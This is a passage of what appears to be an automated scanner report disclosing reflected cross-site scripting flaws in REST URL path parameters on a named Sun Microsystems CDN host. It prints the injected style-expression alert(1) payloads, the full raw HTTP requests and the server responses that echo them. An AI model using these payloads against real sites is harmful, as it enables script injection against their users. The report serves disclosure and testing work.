P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:18:57 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16069

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/share/op/oo_conf_en-US.jsddc6b"style="x:expression(alert(1))"fc9898b9044&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.37. http://www-cdn.sun.com/share/op/oo_engine.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/share/op/oo_engine.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab22d"style%3d"x%3aexpression(alert(1))"36ca69d5d7e was submitted in the REST URL parameter 1. This input was echoed as ab22d"style="x:expression(alert(1))"36ca69d5d7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /shareab22d"style%3d"x%3aexpression(alert(1))"36ca69d5d7e/op/oo_engine.js HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:15:51 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16057

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/shareab22d"style="x:expression(alert(1))"36ca69d5d7e/op/oo_engine.js&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.38. http://www-cdn.sun.com/share/op/oo_engine.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/share/op/oo_engine.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1755"style%3d"x%3aexpression(alert(1))"3491c41c28c was submitted in the REST URL parameter 2. This input was echoed as a1755"style="x:expression(alert(1))"3491c41c28c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /share/opa1755"style%3d"x%3aexpression(alert(1))"3491c41c28c/oo_engine.js HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:17:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16057

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/share/opa1755"style="x:expression(alert(1))"3491c41c28c/oo_engine.js&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

1.39. http://www-cdn.sun.com/share/op/oo_engine.js [REST URL parameter 3] previous

Summary

Severity:	High
Confidence:	Certain
Host:	http://www-cdn.sun.com
Path:	/share/op/oo_engine.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40525"style%3d"x%3aexpression(alert(1))"5061caf1b7d was submitted in the REST URL parameter 3. This input was echoed as 40525"style="x:expression(alert(1))"5061caf1b7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /share/op/oo_engine.js40525"style%3d"x%3aexpression(alert(1))"5061caf1b7d HTTP/1.1
Host: www-cdn.sun.com
Proxy-Connection: keep-alive
Referer: http://www-cdn.sun.com/sharebcdf0%22style%3d%22x%3aexpression(alert(1))%225046987b06c/metrics/metrics_group1.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B9CE72051487D4-60000151E01AC929[CE]

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
X-powered-by: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: public, max-age=31536000
Date: Sun, 06 Mar 2011 15:18:11 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16057

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content=
...[SNIP]...
<a href="/contact/feedback/index.jsp?requrl=/share/op/oo_engine.js40525"style="x:expression(alert(1))"5061caf1b7d&refurl=http://www-cdn.sun.com/sharebcdf0"style="x:expression(alert(1))"5046987b06c/metrics/metrics_group1.js&category=se">
...[SNIP]...

Report generated by XSS.CX at Sun Mar 06 10:03:54 CST 2011.